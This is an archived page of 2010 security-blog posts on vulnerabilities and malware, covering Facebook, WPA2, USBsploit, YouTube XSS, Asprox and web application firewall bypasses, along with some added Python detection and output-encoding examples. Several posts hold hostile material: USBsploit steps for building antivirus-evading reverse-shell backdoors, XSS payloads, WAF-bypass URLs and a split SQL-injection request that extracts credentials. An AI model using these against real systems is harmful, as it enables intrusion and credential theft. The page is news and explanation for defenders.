Archive for category Vulnerabilities & attacks
Vulnerability Makes All Facebook Accounts Exposed
Posted by Mourad Ben Lakhoua in Social Networking, Vulnerabilities, Vulnerabilities & attacks on August 13, 2010
A new vulnerability has been discovered in Facebook that allows an attacker to obtain details of any user on the social network: by knowing only an email address, an attacker can get the name and picture of the victim.
The vulnerability works regardless of the account's privacy settings; this means that even if your account is hidden from all search engines, it is still possible to retrieve this sensitive information.
The gathered information can be used for phishing attacks or for other purposes.
According to the researchers, if someone has a list of email addresses that he knows nothing about, he can feed them to Facebook one by one (or in a list, using a script like this) and chances are that he will get more than 50% hits. This is useful for phishing attacks (people are more easily convinced when they see their *real* names).
Alternatively, an attacker can randomly generate email addresses and build a database of users' names and pictures, which means that you have no privacy and your information can easily be found.
Update :
Facebook, in a statement sent to SCMagazineUS.com on Thursday, said the glitch has been fixed.
“We have technical systems in place to prevent people’s names and profile photos from showing to unrelated users upon login, but a recently introduced bug temporarily prevented these from working as intended,” Facebook said in a statement. “We remedied the situation swiftly.”
make sure you subscribe to my RSS feed!
WPA2 Might Be Spoofed!
Posted by Mourad Ben Lakhoua in News, Privacy & data protection, Vulnerabilities, Vulnerabilities & attacks on July 26, 2010
WPA2 (Wireless Protected Access ver. 2.0) is the second version of a set of algorithms and protocols that protect data in wireless networks. WPA2 was expected to significantly increase the security of Wi-Fi wireless networks compared with previous technologies. The standard mandates the use of the stronger AES (Advanced Encryption Standard) encryption algorithm and 802.1X authentication.
A panel of researchers reported discovering a vulnerability in this protocol, even though it is widely used as the secure standard for wireless networks. AirTight Networks said that this vulnerability concerns networks that follow the IEEE 802.11 standard. The first demonstration of this vulnerability will be held at Defcon 18 this week in Las Vegas.
Hole 196 is the name of this vulnerability. It uses a man-in-the-middle method of attack in which a user who is already authorized on the Wi-Fi network can intercept and decrypt all data transmitted and received by others on the same wireless network. The exploit code will reportedly be made publicly available so that everyone can test it and use it, while the standardization bodies work on adjustments to WPA2.
Md Sohail Ahmad, who will be demonstrating the attack at Defcon, says that it took about 10 lines of code in the open source MadWiFi driver software, freely available on the Internet, and an off-the-shelf client card for him to spoof the MAC address of the AP, pretending to be the gateway for sending out traffic. Clients who receive the message see the client as the gateway and "respond with PTKs", which are private and which the insider can decrypt.
We will be following this research, especially since all access points use this protocol and there should be an update available before the demo to fix this vulnerability.
Spreading Ghosts Attacks
Posted by Mourad Ben Lakhoua in Anti-Viruses, Vulnerabilities & attacks, hacking on July 23, 2010
Leonardo da Vinci is widely considered to be one of the greatest painters of all time, and perhaps the most diversely talented person ever to have lived. Leonardo said that there are three types of people one may encounter: "Those who see. Those who see when they are shown. Those who do not see."
But here I want to add a class of people who see even when they are prevented from seeing: we are talking about the hacker class.
One of the first things an attacker does to compromise a remote system is to use a backdoor. I am referring to a ghost: a piece of software which, once run, gives an attacker access to the remote system and lets him collect all activity on the targeted machine.
USBsploit is a tool that is still in beta and was created by an infosec researcher, the owner of the popular portal Secubs. This tool makes it simple for anyone to generate backdoors within a few steps.
First, you need to choose the right distribution; this can be BackTrack/Debian or Ubuntu with the original Metasploit dependencies. Then you can follow the clear and easy steps on the official website.
When you run USBsploit you will find a menu with the list of actions you can perform:
1. Create a Backdoor
2. Create a Backdoor and launch a Listener only for the USB Dump attack
3. Launch a Listener for the USB Dump attack from the last Dump configuration file
4. Update the USBsploit Framework
5. Edit the last Dump configuration file (needs vi)
6. Edit the global options (needs vi)
7. Edit the file extensions set to dump (needs vi)
If you choose to create a backdoor you will be asked for the IP address of the listener; by default it detects the local machine's IP.
Next you will be asked to select the kind of backdoor you want to deploy, depending on the victim's operating system:
1. Windows Meterpreter Reverse_TCP Spawn a shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64)
3. Windows Meterpreter Egress Buster Spawn a shell and find a port home via multiple ports
The next step is an important one: here you choose the kind of encoding used to try to bypass weak antiviruses.
Select one of the below, Backdoored Executable is typically the best.
1. shikata_ga_nai (Very Good)
2. Multi-Encoder (Excellent)
3. Backdoored Executable (BEST)
After encoding you will find the executable file at "/opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe".
This amazing tool helps create a backdoor that can bypass most popular antiviruses in just a few steps.
My experience was interesting: when testing the generated executable file, which had been encoded by msfencode, only 10 out of 42 antiviruses detected it as a Trojan.
You can run the .exe file on a Windows machine even if it has one of the antiviruses that was not able to detect the malicious code, even with the latest definitions, such as Kaspersky, and then activate the listener.
From here you can access all activity on the target machine and have total visibility of the whole system.
Mozilla Sniffer Add-on Blocklisted for Security Purposes
Posted by Mourad Ben Lakhoua in Browser, Software Security, Vulnerabilities & attacks on July 15, 2010
Mozilla has blocklisted a malicious add-on that had been available on their official website since the 6th of June; the add-on, named Mozilla Sniffer, contains a serious security vulnerability.
According to a blog post, the add-on includes code that intercepts all login data on any website and sends these credentials to a remote location. Mozilla security specialists said that all current users should receive an uninstall notification, and they invite all users to remove the add-on and change all web authentication credentials they have used.
The add-on code had not been reviewed, as it had been submitted online directly; it was only checked against malware, without a review of its functionality, before being made public. A new way of working will be considered in the future, with the aim of a better review process and delightful add-ons.
In the same post a security vulnerability in CoolPreviews version 3.0.1 was reported. This add-on helps users preview a link on a website by just hovering the cursor over it. The bug allows an attacker to execute malicious JavaScript code with local privileges, potentially gaining access to the file system and allowing code download and execution.
Currently, 177,000 users have a vulnerable version installed. All users are invited to update the add-on, while the vulnerable versions will be blocklisted soon.
Fake Windows IME Trojan
Posted by Mourad Ben Lakhoua in Cybercrime & Hacking, Vulnerabilities & attacks on July 11, 2010
Security researchers at Websense have discovered a new Trojan that uses a Windows system feature to disable and delete antivirus software and compromise the victim's machine.
The malicious program installs itself as a Windows input method editor (IME), then stops all AV processes, deletes their executable files and masquerades on the system as an antivirus update package.
Websense has issued a blog post describing the way this Trojan infects a Windows system. After the malware runs, a winnea.ime file is created under the Windows system folder.
When the default input method is opened, the previously created winnea.ime starts to search for and detect antiviruses.
At the same time, winnea.ime creates a file called pcij.sys in the system folder and loads it as a driver.
Next, DeviceIoControl is used to kill the running process of any antivirus in the list; the control code is sent to the driver pcij.sys.
It is clear that the Windows input method is now a popular way for hackers to inject malicious code.
Cross-site scripting on YouTube
Posted by Mourad Ben Lakhoua in News, Vulnerabilities, Vulnerabilities & attacks, Web Security on July 4, 2010
An XSS vulnerability in YouTube's comment processing allows an attacker to execute arbitrary scripts in the security context of the site.
Go on youtube. Choose any video. Add the following script:
<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>
Update (1): It is better to stay away from YouTube until they fix the vulnerability, or at least to log out of YouTube if you use it.
Update (2): Google has informed that the vulnerability has now been fixed:
We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.
You can find the statement here.
Asprox is back!
Posted by Mourad Ben Lakhoua in Cybercrime, Cybercrime & Hacking, Vulnerabilities & attacks on June 27, 2010
Security researchers warn of a fast increase in websites infected by the spam botnet Asprox. The Asprox botnet is carrying out attacks using SQL injection, which allowed it to double its presence on service providers' web applications: in one night the number of compromised resources increased from 5 to 11 thousand.
The botnet usually starts by scanning the network for a vulnerable host, and if it detects a vulnerable website it attacks the targeted host.
M86 Security is currently monitoring and tracking the new threat. In a blog post Rodel Mendrez reported that the pattern of Asprox's behavior has changed: previously it was only used to send spam, now it is carrying out massive SQL injection.
As of this writing, there are three fast-flux domains that the bot attempts to contact.
CL63AMGSTART.RU
HYPERVMSYS.RU
ML63AMGSTART.RU
These three servers are the bot's command and control servers; analyzing the malware binary reveals SQL statements, as the picture shows:
Decrypting the XML file which the bot receives reveals information about the targeted website, as the screenshot shows:

Finally, a simple Google search shows that more than 5000 websites are already infected.

As you can see, criminals are always searching for new ways to spread their malware.
Mozilla Fixes 9 vulnerabilities & adds a Crash Protection to Firefox
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on June 24, 2010
A new release has been issued by Mozilla. Firefox 3.6.4 is the first open source web browser that integrates the plugin functionality with the main process of the browser. This release aims to decrease the number of Firefox crashes.
As usual you can find versions for both Linux and Windows operating systems.
Mike Beltzner wrote on the company's blog that during beta testing the new feature significantly reduced the number of freezes users face while watching online videos or playing online games. At the same time this new release protects users against failures of plugins such as Adobe Flash, Apple QuickTime and Microsoft Silverlight.
All these features come with fixes for 9 vulnerabilities, six of which are critical and allow an attacker to compromise the system and run malicious software on the machine.
It is time to upgrade your browser and check whether you have missed any update.
Fake YouTube Pages Spreading Malware
Posted by Mourad Ben Lakhoua in Cybercrime, Internet, News, Vulnerabilities & attacks on June 10, 2010
Researchers at the eSoft Threat Prevention Team have discovered thousands of fake websites that look like YouTube. The websites contain a video which leads to installing a downloader Trojan with a less than 20% detection rate according to VirusTotal.
The sites look very similar to YouTube, with a high level of quality, to make them look legitimate and trick victims. Cybercriminals exploit users' trust in the YouTube video hosting service to infect as many machines as possible.
The pages contain some "hot video", like "Want to see a revealing video about the Gulf oil spill in Mexico or the NBA Finals?"
This attracts victims so that they agree to install the malicious application, with a high probability that the antivirus does not even flag the file as suspicious.
According to the eSoft Threat Prevention Team, there are now over 135,000 such sites sprouting up all over the Web, and they can be found through the Google search engine. So do not trust such websites, keep your antivirus definitions as up to date as possible and use web filters to detect and prevent these threats.
Detecting & Bypassing Web Application Firewalls (part 2)
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on May 30, 2010
There is no ideal system in the world, and this applies to Web application firewalls (WAFs) too.
While the advantages and positive features of WAFs far outweigh the negatives, one major problem is that only a few action rules are allowed. The white list keeps expanding and requires more development effort, because it is very important to clearly establish the allowed parameters.
The second major problem is that WAF vendors sometimes fail to update their signature definitions, or do not develop the required security rule on time, and this can put the web server at risk of attack.
The first vulnerability (http://www.security-database.com/detail.php?alert=CVE-2009-1593) allows inserting extra characters into the JavaScript close tag to bypass the XSS protection mechanism. An example is shown below:
http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3
Another example (http://www.security-database.com/detail.php?alert=CVE-2009-1594) also allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline), as demonstrated by a %0A in a cross-site scripting (XSS) attack URL.
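As an added illustration of why these two bypasses get past a literal-string signature, and how a matcher that normalizes the parameter first and matches the tag by its grammar catches them, here is a Python example written for this post. It is not code from the WAF products or from the CVE reports; the sample URLs are constructed to follow the shapes described above and are not the original test cases.

```python
import re
from urllib.parse import unquote

# Constructed request URLs for this example (not the page's real test cases).
# The first two mirror the bypass shapes described for CVE-2009-1593 (extra
# characters inside the close tag) and CVE-2009-1594 (an encoded newline).
SAMPLE_URLS = {
    "extra_chars": "http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E",
    "newline": "http://testcases/phptest/xss.php?var=%3Cscript%0A%3Ealert(1)%3C/script%3E",
    "plain": "http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(1)%3C/script%3E",
    "benign": "http://testcases/phptest/xss.php?var=hello%20world",
}


def naive_blocks(url: str) -> bool:
    """A literal-string signature: decode once, then look for the exact
    substrings '<script>' and '</script>'. This is the style of check that
    the two CVEs above get past."""
    low = unquote(url).lower()
    return "<script>" in low and "</script>" in low


def normalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so a doubly
    encoded payload is inspected in the form the application will see."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


# Tag grammar that tolerates whitespace or newlines after '<' and before the
# name, and ignores attributes or junk between the tag name and '>'.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b[^>]*>", re.IGNORECASE | re.DOTALL)


def normalized_blocks(url: str) -> bool:
    """Inspect each query parameter after normalization and match the script
    tag by its grammar rather than by an exact string."""
    query = url.partition("?")[2]
    for pair in query.split("&"):
        value = pair.partition("=")[2]
        if SCRIPT_TAG.search(normalize(value)):
            return True
    return False


def compare(urls=SAMPLE_URLS):
    """For each sample: (blocked by the naive check, blocked by the normalized check)."""
    return {name: (naive_blocks(u), normalized_blocks(u)) for name, u in urls.items()}


if __name__ == "__main__":
    for name, verdict in compare().items():
        print("%-12s naive=%s normalized=%s" % (name, *verdict))
```

The point of the comparison is that both evasions leave the decoded payload looking different from the exact string the naive rule expects, while a rule that decodes first and then matches a tolerant tag grammar sees the same script element in all three malicious samples and still leaves the benign one alone.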
HTTP Parameter Pollution (HPP)
HPP was first described by two Italian researchers, Luca Carettoni and Stefano di Paola. HPP gives an attacker the ability to submit multiple HTTP parameters (POST, GET) with the same name through several input channels (query string, POST data, cookies, etc.).
The application may react in unexpected ways and open up new avenues of server-side and client-side exploitation. The most notable example is a vulnerability in IIS + ModSecurity which allows SQL injection attacks thanks to two behaviours:
1. IIS concatenates HTTP parameters submitted with the same name. For example:
POST /index.aspx?a=1&a=2 HTTP/1.0
Host: www.example.com
Cookie: a=5;a=6
Content-type: text/plain
Content-Length: 7
Connection: close
a=3&a=4
For such a request, IIS/ASP.NET sets a (Request.Params["a"]) equal to 1,2,3,4,5,6.
2. ModSecurity analyzes the request parameters one by one, as the web server has already parsed them, and rejects an obvious injection such as: http://testcases/index.aspx?id=1+UNION+SELECT+username,password+FROM+users
However, the following request, with the statement split across parameters, is not rejected:
POST /index.aspx?a=-1%20union/*&a=*/select/* HTTP/1.0
Host: www.example.com
Cookie: a=*/from/*;a=*/users
Content-Length: 21
a=*/name&a=password/*
As a result, the database executes the reassembled query:
SELECT b, c FROM t WHERE a =- 1 /*,*/ UNION /*,*/ SELECT /*,*/ username, password /*,*/ FROM /*,*/ users
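To make the two behaviours concrete, here is an added Python example (written for this post, not ModSecurity's or IIS's code) that collects a repeated parameter from the query string, body and cookie in the order the article gives for Request.Params, merges it under a chosen policy, and runs one SQL injection signature both per value and on the merged value. The requests are constructed from the article's example; the "first" and "last" policies are assumptions standing in for other server stacks.

```python
import re
from urllib.parse import parse_qsl

# Constructed request, following the split-injection example in the article
# (query string, POST body and cookie each carry fragments of one statement).
SPLIT_REQUEST = {
    "query": "a=-1%20union/*&a=*/select/*",
    "body": "a=*/name&a=password/*",
    "cookie": "a=*/from/*;a=*/users",
}

# The obvious single-parameter form that a per-parameter signature catches.
PLAIN_REQUEST = {
    "query": "id=1+UNION+SELECT+username,password+FROM+users",
    "body": "",
    "cookie": "",
}

SQLI_SIGNATURE = re.compile(r"\bunion\b.*\bselect\b.*\bfrom\b", re.IGNORECASE)
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def parse_cookie(header: str):
    """Split a Cookie header into (name, value) pairs, keeping duplicates."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value))
    return pairs


def collect_values(request, name):
    """All values of one parameter, in the order the article reports for
    IIS/ASP.NET Request.Params: query string, then form body, then cookies."""
    pairs = (parse_qsl(request["query"], keep_blank_values=True)
             + parse_qsl(request["body"], keep_blank_values=True)
             + parse_cookie(request["cookie"]))
    return [value for key, value in pairs if key == name]


def merge(values, policy):
    """How the backend sees a repeated parameter. 'concat' is the IIS
    behaviour from the article; 'first' and 'last' are assumed policies
    standing in for stacks that keep only one occurrence."""
    if not values:
        return ""
    if policy == "first":
        return values[0]
    if policy == "last":
        return values[-1]
    if policy == "concat":
        return ",".join(values)
    raise ValueError("unknown policy: %s" % policy)


def strip_comments(sql: str) -> str:
    """Replace closed /* ... */ comments with a space, as the database would ignore them."""
    return SQL_COMMENT.sub(" ", sql)


def inspect_parameter(request, name, policy):
    """Run the signature twice: once per individual value (what a filter that
    ignores the backend's merge policy does) and once on the value as the
    backend will actually assemble it."""
    values = collect_values(request, name)
    per_value_hits = [v for v in values if SQLI_SIGNATURE.search(strip_comments(v))]
    merged = strip_comments(merge(values, policy))
    return {
        "values": values,
        "per_value_hits": per_value_hits,
        "merged": merged,
        "merged_hit": bool(SQLI_SIGNATURE.search(merged)),
    }


if __name__ == "__main__":
    for policy in ("first", "last", "concat"):
        print(policy, inspect_parameter(SPLIT_REQUEST, "a", policy))
```

Under the "concat" policy no single fragment matches the signature, but the merged value does, which is exactly the gap the article describes: a filter has to reassemble parameters the way the protected backend will, or it is inspecting something the database never sees.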
XSS
Cross Site Scripting (XSS) is probably the best method for getting past a Web application firewall (WAF), thanks to JavaScript's flexibility. At the BlackHat conference a large number of methods to trick filters were presented. For example:
object data="javascript:alert(0)"
isindex action=javascript:alert(1) type=image
img src=x:alert(alt) onerror=eval(src) alt=0
x:script xmlns:x="http://www.w3.org/1999/xhtml" alert('xss'); x:script
More XSS information can be found on the following links:
– http://ha.ckers.org/xss.html
– http://sla.ckers.org/forum/list.php?24
– http://maliciousmarkup.blogspot.com/
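Since filter lists like the one above can always be extended with a new vector, the durable fix on the application side is output encoding for the context the data lands in, which is also what the YouTube comment issue earlier on this page comes down to. The following Python example is added here to show that; it is not code from YouTube, Mozilla or any WAF vendor. The sample comments are constructed to follow the shapes of the vectors listed above and of the YouTube payload, and the showComment function name is a placeholder.

```python
import html
import json

# Constructed sample comments for this example. They follow the shapes of the
# YouTube payload and of the filter-evasion vectors listed in the WAF article;
# none of this is data taken from the incidents themselves.
SAMPLE_COMMENTS = [
    "Great video, thanks!",
    '<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>hello<script>',
    '<object data="javascript:alert(0)">',
    '<img src=x:alert(alt) onerror=eval(src) alt=0>',
    '" onmouseover="alert(1)',
    "</script><script>alert(1)</script>",
]


def render_comment_html(comment: str) -> str:
    """HTML body context: every '<', '>', '&' and quote in the comment is
    entity-encoded, so the browser shows the text and never parses it as tags."""
    return '<li class="comment">%s</li>' % html.escape(comment, quote=True)


def render_comment_attribute(comment: str) -> str:
    """Quoted attribute context: the same encoding keeps a quote inside the
    comment from closing the attribute and starting an event handler."""
    return '<a href="#" title="%s">comment</a>' % html.escape(comment, quote=True)


def render_comment_js(comment: str) -> str:
    """Inline-script context: JSON-encode the string (quotes and backslashes
    escaped), then also escape '<' and '>' so that a '</script>' inside the
    data cannot terminate the script block early. showComment is a placeholder."""
    literal = json.dumps(comment).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>showComment(%s);</script>" % literal


def markup_is_inert(comment: str) -> bool:
    """True when none of the three renderings lets comment data introduce a
    tag, a new attribute or an extra script block."""
    body = render_comment_html(comment)
    attr = render_comment_attribute(comment)
    js = render_comment_js(comment)
    return (
        body.count("<") == 2                  # only our <li> and </li>
        and attr.count('"') == 4              # href="#" and title="..."
        and js.count("<script>") == 1 and js.count("</script>") == 1
    )


def check_all(comments=SAMPLE_COMMENTS) -> bool:
    """Every sample comment stays inert in every context."""
    return all(markup_is_inert(c) for c in comments)


if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        print(markup_is_inert(c), render_comment_html(c))
```

The three render functions differ only in the encoding rule, and that is the point: the rule is chosen by where the data is inserted, not by what the data looks like, so it does not need to recognise any particular vector to neutralise it.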
New developments in Web application firewalls are forthcoming. Sometimes it seems that everything has already been discovered and that it makes no sense to search for something new, but there is always room for new research.
It is very important to look at all the details of your WAF to have a clear view of your security assets.